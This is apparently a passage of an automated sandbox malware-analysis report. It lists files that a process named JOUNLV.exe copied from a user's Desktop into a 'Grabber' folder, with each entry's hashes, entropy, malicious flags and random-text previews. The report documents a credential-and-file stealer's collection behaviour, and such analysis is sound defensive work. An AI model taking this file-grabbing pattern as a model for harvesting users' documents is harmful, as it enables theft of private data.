                                                                                                                                                                                                                                                          Preview:Videos\...desktop.ini..

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Desktop\CURQNKVOIX.png

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.688505748329201
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:fOpwMLhSm1UbWgtD1i0Sn1EcsITViZiFeEaf:gLhSGqP1vSn11l8ceTf
                                                                                                                                                                                                                                                          MD5:E791BC4BB488A2AE526214AB2CCF03F0
                                                                                                                                                                                                                                                          SHA1:FEBDEFE4D61586EE877A369BB31B4B92B19D5E2D
                                                                                                                                                                                                                                                          SHA-256:4EFC0B5E75E9B1A642F3BC4FACAE7C8F8C77DFAD5F6C0F3F2C807B3654576616
                                                                                                                                                                                                                                                          SHA-512:61EF6F62E86F65DA2E7CC9821DA2AD669C4AD62275A044153BCE247AB2FCCC938B7EB57C46099AB4A84909CEC5104FF5B95D12161C3D7AA353B79647122C15BB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:CURQNKVOIXHCBQTSXQTLVFUQNXQHHCWYVOGQUFVROSMMUONAUKUVELZWAMQGAGYEFMWBMUVKBAZCJASDGVTNFSHXHAPKEOWREALSYDMQPTJCKDQQZDNAPQIKAIKYDUXQDSIUJTIPCNAAPMQGBGORBBNYWTYRCODCKULTLKEDUVEVKYPTDPYWDHCCBFECLXTAHWTXYPAZBSUTWHNQPXUDZWAFEXNNPHGXWELAOZZREMNKMEKGTYGDHHUPJBMUOYYXAJRRWPIQWIEPWHTLVXJLPGWKHKFXPDTYKJNXBLYYCPPFYQHGBFNFBWUMKZVGJIAVXIXSEBJLYUYIFUDPWOVTOOTBWQNFVWLEYTFZYMTVZTCXTNNOBULSEYPLNAUCUUXLNZYIOCYYDRCXSVNBKUELOGHSLSPEKWUKINGRPMAGAJOPDOAGHPUAWUEWUGLAMOKASQCGYIJJNOEPUMCDLGYXGDJZABOLHJPLTUZIRBYLLYXROOEMOQWYXXOAXTWHXGMBRZIHEQPGICIJAOUSIKAJLZMEYDYWOFIVZEOLJQJXJLMMENDALUSENORVPGKLPBGAOQTNXCQSBECDXXCUNXHQLIPKOPVIETEIHHAZEFGOVYXJDBAQKQLDPIRHULNGBRDMBBZUKYVYIMBYVBNOIAKOFSHELZEVHLIYEWGVJXILTMZMBNWYJQUHFWZYDKPGFHJSRFOPTSUPYFZPRAIHCOAERERYGBLWLZZXLVAABEELDQELBYYROYSDLAWBIXRDKWLSLZQHNQYXERTVTNXGSHYGJOFVZISVKALMEBXVVOOXWYXSEINIZOTUVHTHDUHOJYJHLRGMSQXTWPSJZLTSSIKIIZPANAJSXTZAQBOKZRWBIRVFAHJIOEWMRKYMRVDYTGEWXHCWSRYRIGQHBYXEUXHZUSULJVNSYTNQRKAFOOQPRHBAAWVXLENJLGFYHTWUFVYSQDBXKEFYRPMBGBHQLJSVGLYIZQREICHIHYUTGCEP

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Desktop\JSDNGYCOWY.jpg

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.690895772725941
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:ZTWQe0oC6OG/K8Vsypd0HuXw0xVfU/Vzv98UU:ZTWQr2VyXysHIwcGKUU
                                                                                                                                                                                                                                                          MD5:A002E80B55673139253599B753BDC01A
                                                                                                                                                                                                                                                          SHA1:6AEEF831A5AAB9155AAABB52D173859E20A86932
                                                                                                                                                                                                                                                          SHA-256:F3484FA4E615D7134AC1BF4C3355C6AD63B32AC3CD096345C5EBF6B0CE6669A0
                                                                                                                                                                                                                                                          SHA-512:D4A9257255BA4610E904C005F6734E65D5B0B4489E645792F3AB52AFD59B4B76E4B0FCE1F3457D7E5D3DA3101DAAC80A926FA513B77DAB01F2DAC5F5C4304CA7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:JSDNGYCOWYHKSOWFGCIERRTFYJMLBLSAMTEZRBUWFRXYICIUHZNIMVLJXTFXQNXACRFWSEWJBERQHLEBPYXRECCWDJKIIOUGNYQMGAHSLOPLLALAEDDKJTOOCDGYIBOWZZREIEWSXQRGULZIXFYNIUMNTNALWVABHVLKEJLBKGOKXZWDSWRTTLTQLNTZDYMSECYMQISNCNIAJOWDCCMHWLIVFACQKZXXZJOSENBJHZELIVOCAHDNZGZILFSILTSAJXDBFAIPHVHXYHJHVMVHKVOMYOGGVIKVJUVYLDFTICBCZKSVRDRTALSXFNMCPLGOGSEBKXSHSHVDVDKWEHNIBLPTMWICAACVFWPQNIUVLFSAWPOGDJFOGTXDHMTFWREVZXCABJCKFYXJGAHKTXNFLIILTMBRTKACTMOVDBLCVYDVLNCDXAAINTGCCRZPDTOFCWZWTHLCVGRTQPEBHUFYWLTLNUIOFLOUTCINZEJUVLTZPPDBVDEELCGFQSGJPRJBEALQLZQAYAQRUTUANCYUZJENWEIISDNULLJXJUPBQHEJEUVMKMEUQRDHXPAZVIFDUGNWXKXYWIQQNJNRMYCLJLHWESVCNCQSXILKRQFSYEDZSBHSLAYIWWOVRVVSWUFEAQPMAPAKFCXFBDIPKHPSFGVOJCEEBALPVQKECBBUCTQGQXOQAPOOYAPYQXNDLKJDRFQDILPIWRGDYTFUHSZLJICMMUSSHGHNLKNEDYXJSPECVTAEQTVXATOODAVROWNAPCHDRRBHVDVWBGOSCJGDENAGFCYDIHAPBWLJNOPCQCPTSOHGQQMHEAKRBOBSEHAOMGXJVYWJGLSIQJUOMYPNZTOFVNNMRIVMHOCFZTLTEDAGEXGJXLNRLSHJQGFHIJDLJHOPPMFPYEIXPRQCTRDIYDJEHHSKFBRZMXLZJBDDOYCXQJBCBQFRXVCYCHXKGNDWEEUUKPAGVHHOXFZXZEWWCOVSFYZHILZJQQKFHCLR

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Desktop\JSDNGYCOWY.xlsx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.690895772725941
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:ZTWQe0oC6OG/K8Vsypd0HuXw0xVfU/Vzv98UU:ZTWQr2VyXysHIwcGKUU
                                                                                                                                                                                                                                                          MD5:A002E80B55673139253599B753BDC01A
                                                                                                                                                                                                                                                          SHA1:6AEEF831A5AAB9155AAABB52D173859E20A86932
                                                                                                                                                                                                                                                          SHA-256:F3484FA4E615D7134AC1BF4C3355C6AD63B32AC3CD096345C5EBF6B0CE6669A0
                                                                                                                                                                                                                                                          SHA-512:D4A9257255BA4610E904C005F6734E65D5B0B4489E645792F3AB52AFD59B4B76E4B0FCE1F3457D7E5D3DA3101DAAC80A926FA513B77DAB01F2DAC5F5C4304CA7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:JSDNGYCOWYHKSOWFGCIERRTFYJMLBLSAMTEZRBUWFRXYICIUHZNIMVLJXTFXQNXACRFWSEWJBERQHLEBPYXRECCWDJKIIOUGNYQMGAHSLOPLLALAEDDKJTOOCDGYIBOWZZREIEWSXQRGULZIXFYNIUMNTNALWVABHVLKEJLBKGOKXZWDSWRTTLTQLNTZDYMSECYMQISNCNIAJOWDCCMHWLIVFACQKZXXZJOSENBJHZELIVOCAHDNZGZILFSILTSAJXDBFAIPHVHXYHJHVMVHKVOMYOGGVIKVJUVYLDFTICBCZKSVRDRTALSXFNMCPLGOGSEBKXSHSHVDVDKWEHNIBLPTMWICAACVFWPQNIUVLFSAWPOGDJFOGTXDHMTFWREVZXCABJCKFYXJGAHKTXNFLIILTMBRTKACTMOVDBLCVYDVLNCDXAAINTGCCRZPDTOFCWZWTHLCVGRTQPEBHUFYWLTLNUIOFLOUTCINZEJUVLTZPPDBVDEELCGFQSGJPRJBEALQLZQAYAQRUTUANCYUZJENWEIISDNULLJXJUPBQHEJEUVMKMEUQRDHXPAZVIFDUGNWXKXYWIQQNJNRMYCLJLHWESVCNCQSXILKRQFSYEDZSBHSLAYIWWOVRVVSWUFEAQPMAPAKFCXFBDIPKHPSFGVOJCEEBALPVQKECBBUCTQGQXOQAPOOYAPYQXNDLKJDRFQDILPIWRGDYTFUHSZLJICMMUSSHGHNLKNEDYXJSPECVTAEQTVXATOODAVROWNAPCHDRRBHVDVWBGOSCJGDENAGFCYDIHAPBWLJNOPCQCPTSOHGQQMHEAKRBOBSEHAOMGXJVYWJGLSIQJUOMYPNZTOFVNNMRIVMHOCFZTLTEDAGEXGJXLNRLSHJQGFHIJDLJHOPPMFPYEIXPRQCTRDIYDJEHHSKFBRZMXLZJBDDOYCXQJBCBQFRXVCYCHXKGNDWEEUUKPAGVHHOXFZXZEWWCOVSFYZHILZJQQKFHCLR

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Desktop\KZWFNRXYKI.pdf

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                                          MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                                          SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                                          SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                                          SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Desktop\NIKHQAIQAU.pdf

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.690394987545919
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
                                                                                                                                                                                                                                                          MD5:CA901F8E74EB7955CF06A00BD424C0C2
                                                                                                                                                                                                                                                          SHA1:0876F92A018E8AB57F666FBB048B1CD028607A38
                                                                                                                                                                                                                                                          SHA-256:6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
                                                                                                                                                                                                                                                          SHA-512:7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Preview:NIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTNODZEVLZHOZSPIROLEDDZIVDLRTCVHZIXTARRYNQXDSJTZFOOYHUCROZUVPHMDRIWZWYNOATHQMKGZMPPIBYIAXUSGLYFPQTHUARHNEBTECYTUUCXJOESOPPKVXGBHXGPHIYJEJAYBFOVPMDVWEZNFBQJKZAWGCIWNFBSDPSSBBQTNYDJVQTTPUWPOOTVYKITOESDZWHOTFCZIQUYASDBGWAPMXAFIGQFPGWTRNBMHCXAZNMKIOSHYBMTSDERCDBFQSLEBTIGMCRUGZJZQAMYIFXIHLBUBWXCKIQTVQNMYMUYZWTTRQAVEAQFTTDTEFYTIXVPFUZALHHYLJHLNOFTPHODDWSFLBPCVKNDNFYPRHRVBHZSKKAJYBRTRWEHCIAZYAWYXGIRJSURFADGDZBTKMLEAYICWBYEAKNBIIDMQKZIXOLIQHETRIJJOSQDVZXKTZOMXOXGKIEJJNUHMCNVBNTYVETDBZHKYQLQYJBSUUNGMIURLIIINJAVXYNHTVSYTVBSAGNGQGUYADHTCDXNDKQFKCMHFRLWQZMSHDZEBEGPOSOPFUUHIVYBVXTLHFYHMHALQHNIUKMTKRBYZDOEALSNTXJRYMEETOQRISFEOVJSBVNMZFHXIDWOPIZKHISVTXVHAUPHEUOQLFVPNKREKEFDTLOWUVDKPDDCBKKSSGLLJSGVCAKVVFFKUKYVELNQTKZZRSDNEKDHUGDQWFBGFQMTINSXDOXPQOPZWHRDBBIZNGWLXSHCGVIBTIQEUTFYRIYKHRANDXVFREQPDFPRAKAFCQSRGTEIQGEAVDTJRESPBHYVTTLHWYQSKOZIBJZRSUJETZFCGMBHNYUSWWAENDXQUJFMLWZXGNLDFLSRZJBBJCPWKHFZXEVBDCLKULDSDXUFVEWFBMUMFQQONCJFFBARKNAVJ

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Desktop\RAYHIWGKDI.jpg

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.69782189124949
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
                                                                                                                                                                                                                                                          MD5:0640503E533EFB11CC70F43D2FFF4E26
                                                                                                                                                                                                                                                          SHA1:EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
                                                                                                                                                                                                                                                          SHA-256:F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
                                                                                                                                                                                                                                                          SHA-512:10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:RAYHIWGKDIRTARQYQWOBCGSCZTUKIHKHGIDMMEQIAQREXBEXSICMBOCZGGWHBLUMCKDMBQEITRPKYTMYLFIYWQOJESATZEPWZIOXPWBQZTJXLAJZABRWIVUBVJFSNDCHMUKOSZLAGXHWLJOZTOGXVRCKZUWMQJXXEBALSHWQQWMZSSNQPYAVMCOWPGIQXROQBVBCHGZFDUPLKTFJZFLPQAZUSOCBPSHUJTOHHLCAJMVXHEMQRTWBFOCSIQLCVPUVRLGBXUQDWIUHVAEKDXVYQFLOJKPUTQAUYMMBEAALRHWXLPSGJQAXQEKMLZIZODFPAFRSSEYDMLJMRHMTAAIXEFUIILJKVGEZOYKKWEPVJQVNYFFYKRTQETFXFNAJIKRVPASKSGPKFCKZPAWWPVZRALMCBKRDOEIBIKKTHQIKXETYHIXFIDXRTNRQTJUYJKPFSYLHGPQHDQCLEGRHMOWEKRHPYXHYBEJRWKNVHYVSFWCDDPTNQKIIPYEUERDNPUHTABOGALJFLNCHFVUUXYWKPWLFGSGGMLBJNUKSZDRMWINHKUODGVGUBXUFJZPIOPPUJJYPIYBSMFJDODMOMNHZLFGXCLRVZWGCTYATVPBVTSKSTKWSAFNJQHUTMYXATQBLVEOPUSEAHMLQDLRSJXGJWRUIJXFKGYOEOWEZOSKCJPIVESIUXOBETKSWFUVRRKSLBTDFQSCFNKQERIRRRREBLOQVLIDYLYKYFMCQBLBQTNJMMMKSVARWYDTJAARNVMOUPHYNYYQMCBERSBXMHXDBNYDZXQLRKYTIFDCWTEPNQGQDWHEMKECWRJGPESGZBVSBOMTJRUQQIBGIJFHOYKRJHNKMSSTEXXZGWSIGMLAJNJNUENSYJRBGUJKNETIMQHONDPCBMBYBIBNOHNJQYWEOHOCGOHXGWYYBPTHRZNFMHKEAHSEPDNXXSDYRREJULDTKDSLQABJKBZDQSIPXTUMOMUNOTGBAJQSBTRFIGSLC

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Desktop\WUTJSCBCFX.docx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.688284131239007
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                                                                                                                                                                                                          MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                                                                                                                                                                                                          SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                                                                                                                                                                                                          SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                                                                                                                                                                                                          SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Desktop\WUTJSCBCFX\JSDNGYCOWY.jpg

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.690895772725941
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:ZTWQe0oC6OG/K8Vsypd0HuXw0xVfU/Vzv98UU:ZTWQr2VyXysHIwcGKUU
                                                                                                                                                                                                                                                          MD5:A002E80B55673139253599B753BDC01A
                                                                                                                                                                                                                                                          SHA1:6AEEF831A5AAB9155AAABB52D173859E20A86932
                                                                                                                                                                                                                                                          SHA-256:F3484FA4E615D7134AC1BF4C3355C6AD63B32AC3CD096345C5EBF6B0CE6669A0
                                                                                                                                                                                                                                                          SHA-512:D4A9257255BA4610E904C005F6734E65D5B0B4489E645792F3AB52AFD59B4B76E4B0FCE1F3457D7E5D3DA3101DAAC80A926FA513B77DAB01F2DAC5F5C4304CA7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:JSDNGYCOWYHKSOWFGCIERRTFYJMLBLSAMTEZRBUWFRXYICIUHZNIMVLJXTFXQNXACRFWSEWJBERQHLEBPYXRECCWDJKIIOUGNYQMGAHSLOPLLALAEDDKJTOOCDGYIBOWZZREIEWSXQRGULZIXFYNIUMNTNALWVABHVLKEJLBKGOKXZWDSWRTTLTQLNTZDYMSECYMQISNCNIAJOWDCCMHWLIVFACQKZXXZJOSENBJHZELIVOCAHDNZGZILFSILTSAJXDBFAIPHVHXYHJHVMVHKVOMYOGGVIKVJUVYLDFTICBCZKSVRDRTALSXFNMCPLGOGSEBKXSHSHVDVDKWEHNIBLPTMWICAACVFWPQNIUVLFSAWPOGDJFOGTXDHMTFWREVZXCABJCKFYXJGAHKTXNFLIILTMBRTKACTMOVDBLCVYDVLNCDXAAINTGCCRZPDTOFCWZWTHLCVGRTQPEBHUFYWLTLNUIOFLOUTCINZEJUVLTZPPDBVDEELCGFQSGJPRJBEALQLZQAYAQRUTUANCYUZJENWEIISDNULLJXJUPBQHEJEUVMKMEUQRDHXPAZVIFDUGNWXKXYWIQQNJNRMYCLJLHWESVCNCQSXILKRQFSYEDZSBHSLAYIWWOVRVVSWUFEAQPMAPAKFCXFBDIPKHPSFGVOJCEEBALPVQKECBBUCTQGQXOQAPOOYAPYQXNDLKJDRFQDILPIWRGDYTFUHSZLJICMMUSSHGHNLKNEDYXJSPECVTAEQTVXATOODAVROWNAPCHDRRBHVDVWBGOSCJGDENAGFCYDIHAPBWLJNOPCQCPTSOHGQQMHEAKRBOBSEHAOMGXJVYWJGLSIQJUOMYPNZTOFVNNMRIVMHOCFZTLTEDAGEXGJXLNRLSHJQGFHIJDLJHOPPMFPYEIXPRQCTRDIYDJEHHSKFBRZMXLZJBDDOYCXQJBCBQFRXVCYCHXKGNDWEEUUKPAGVHHOXFZXZEWWCOVSFYZHILZJQQKFHCLR

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Desktop\WUTJSCBCFX\KZWFNRXYKI.pdf

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                                          MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                                          SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                                          SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                                          SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                                          Malicious:false
